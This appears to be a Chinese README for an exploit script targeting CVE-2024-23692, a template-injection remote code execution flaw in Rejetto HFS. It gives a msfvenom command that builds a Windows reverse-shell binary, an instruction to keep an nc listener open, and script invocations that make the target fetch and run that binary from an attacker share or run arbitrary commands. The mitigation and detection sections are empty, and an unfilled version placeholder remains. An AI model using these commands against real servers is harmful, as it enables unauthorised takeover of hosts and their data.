Rejetto HFS(HTTP文件服务器)是一个简单的Web文件服务器,方便通过网络或互联网进行文件共享。尽管其易于使用且简单,但已发现一个严重漏洞(CVE-2024-23692),使该服务器成为攻击者的目标。
CVE-2024-23692 是 Rejetto HFS 中发现的服务器端模板注入(SSTI)漏洞。该漏洞允许攻击者在服务器上注入并执行恶意模板。如果被利用,可能导致远程代码执行,可能危及整个服务器及其托管的数据。
攻击者利用此漏洞可以:
使用 msfvenom 生成的恶意二进制文件获取 Shell。
注意:保持 nc 监听。
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_1.png)
远程运行命令。
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo
显示结果可能需要大约15秒。
![[Screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_2.png)
所有版本的 Rejetto HFS,包括最高至[在此处插入最新受影响版本]的版本,都受此漏洞影响。
为减轻 CVE-2024-23692 带来的风险,建议用户:
要判断您的服务器是否已被入侵,请留意:
如需进一步帮助和支持,请参考 Rejetto HFS 社区论坛或官方支持渠道。
本项目采用 MIT 许可证 - 详情请参阅 LICENSE 文件。